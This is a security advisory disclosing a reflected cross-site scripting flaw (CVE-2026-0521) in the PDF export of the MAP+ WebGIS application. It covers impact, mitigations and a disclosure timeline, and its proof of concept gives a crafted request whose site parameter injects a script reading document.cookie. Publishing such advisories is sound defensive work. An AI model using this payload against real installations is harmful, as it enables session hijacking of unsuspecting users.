During a recent engagement, Redguard’s security team conducted a penetration test against the GIS infrastructure of a customer. During this penetration test, a reflected cross-site scripting (XSS) vulnerability was discovered in the PDF export functionality of the MAP+ application, a WebGIS solution that provides a map to view, edit, and export geodata developed by the vendor TYDAC AG. This flaw, now assigned CVE-2026-0521, enables an unauthenticated attacker to craft a malicious URL, that if visited by a victim, executes JavaScript in the victim’s context. This vulnerability was rated with a medium-severity CVSS base score of 5.6. Concluding the initiated coordinated disclosure process, the vendor has released a patch to address this issue.

Security Advisory for CVE-2026-0521

A reflected cross-site scripting (XSS) vulnerability in the PDF export functionality of the MAP+ WebGIS solution allows unauthenticated attackers to craft a malicious URL, that if visited by a victim, will execute arbitrary JavaScript in the victim’s context. Such a URL could be delivered through various means, for instance, by sending a link or by tricking victims to visit a page crafted by the attacker.

• Vulnerability Type: Reflected cross-site scripting (XSS) via a specially-crafted URL
• Attack Vector: Unauthenticated user crafts a malicious URL that is subsequently opened by a victim
• Affected Product: MAP+
• CVSS Score: 5.6 (MEDIUM - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:P)
• CVE: CVE-2026-0521

Proof of Concept (PoC)

MAP+ allows users to export a chosen map boundary as PDF. If the application encounters an error during the export, the value of the site parameter is improperly reflected in the error message returned to the user. This output is not correctly sanitized, allowing for the injection of attacker controlled scripts. The following request was sent by the users browser after initiating the PDF export:

1
2
3
4
5
6
POST /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&dpi=300&colmode=0&imgw=0&imgh=0&pts=&ext=[REDACTED]&bl=[REDACTED]&vl=&op=&layout=[REDACTED]&folder=[REDACTED]&site=ext&scale=2500&maintitle=&angle=0&grid=b&legend=1&lang=de&pr=&sessID=[...]&logging=mapplus_state HTTP/1.1
Host: [REDACTED]
Cookie: [...]
Content-Type: application/x-www-form-urlencoded

accepted=ok&print_highlight=

The server then responded with a path to the generated PDF file:

1
2
3
4
5
HTTP/1.1 200 OK
Content-Length: 46
Content-Type: application/json;charset=UTF-8

{"url":"/mapimage/ext-[REDACTED]-[REDACTED].pdf"}

If the parameter site was changed to an XSS payload, the server reflected the parameter unescaped in the response. For instance, a GET request to /mapplus-lib/mapplus-dojo/v3.4.0/php/processPDFdocument.php?ugroup=public&uprofile=public&dpi=300&colmode=0&imgw=0&imgh=0&pts=&ext=[REDACTED]&bl=[REDACTED]&vl=[REDACTED]&op=1|1|1&layout=[REDACTED]&folder=[REDACTED]&site=%3Cscript%3Ealert(document.cookie)%3b%3C%2fscript%3E&scale=25000&maintitle=&angle=0&grid=b&legend=1&lang=de&pr=&sessID=[...]&logging=mapplus_state&accepted=ok&print_highlight= resulted in the following response:

1
2
3
4
5
HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Content-Length: 110

{error:"Syntax error in D:\www\[REDACTED]/<script>alert(document.cookie);</script>/public/config/print_lyr.conf"}

It should be noted that the error is only reflected if the victim has already a valid session cookie stored in their browser. Such a session cookie is automatically assigned when initially visiting the web page.

Impact

When attackers manage to successfully exploit this vulnerability, they can execute malicious JavaScript in the victims’ browser. This allows to read the web application session cookie and hijack their session. Depending on the configuration this would enable attackers to edit the data stored given the account holds the necessary privileges.

Affected versions

This vulnerability was identified in MAP+ in version 3.4.0. According to the customer this was the latest patch level at the time of the penetration test.

Suggested Mitigations and Countermeasures

The vendor has addressed this vulnerability by providing backports for all versions greater 3.0. Based on information given by the vendor the version numbers of patched installations do not differ. Therefore, version numbers cannot be used to determine whether the vulnerability was patched. As an additional defense-in-depth measure besides patching, Redguard recommends that a strong Content-Security-Policy (CSP) is configured to mitigate this attack. Furthermore, care should be taken that other web applications running on the same domain do not trust the application, such as by using Cross-Origin Resource Sharing (CORS).

Credits

• Benjamin Faller, Redguard AG
• David Wischnjak, Redguard AG

Timeline

In the following timeline, the customer refers to the company that tasked Redguard with a penetration test of their application and the vendor refers to the TYDAC AG team.

• 2025-09-19: Redguard reported the vulnerability to the customer
• 2025-09-26: Customer agreed to initiate the CVD process
• 2025-11-14: Redguard notified the vendor regarding the vulnerability and the intent to pursue CVD
• 2025-12-03: Redguard contacted the vendor via phone due to no response. The vendor requested that information be resent to a specific email address as it was not received.
• 2025-12-04: Redguard shared the technical details with the vendor. The vendor acknowledged prior receipt of these findings via the customer and stated that a patch had already been provided. Redguard inquired if patch verification was required prior to publication; no response was received.
• 2025-12-16: Redguard contacted the NCSC to reserve a CVE ID
• 2025-12-17: NCSC reserved CVE-2026-0521
• 2026-01-15: Redguard asked the vendor whether any open points prior to the publication exist
• 2026-01-16: Vendor called Redguard to clarify open questions. Both parties agreed to discuss this in a meeting the following week.
• 2026-01-19: Meeting was planned. The vendor asked to receive a publication draft before the meeting which was provided again, including examples of prior published advisories.
• 2026-01-20: Short alignement call between Redguard and the vendor. The vendor clarified that a retest would not be necessary and agreed to provide the affected and fixed version numbers.
• 2026-01-20: Vendor provided incomplete version numbers
• 2026-01-26: Redguard asked for the exact affected version numbers
• 2026-01-30: Redguard called the vendor regarding the version numbers. The vendor explained that no exact version numbers can be provided since all installations were patched using backports, which retained the same version number.
• 2026-01-30: Redguard updated the NCSC with the planned publication date
• 2026-02-05: Publication of this advisory

Disclaimer

This advisory is not an exhaustive list of all potential security issues for the mentioned software. Other vulnerabilities may exist. The information provided is believed to be accurate at the time of publishing. Use of this information is at your own risk. Neither the author nor the publisher accepts any liability for any loss or damage arising from the use of, or reliance on, this information.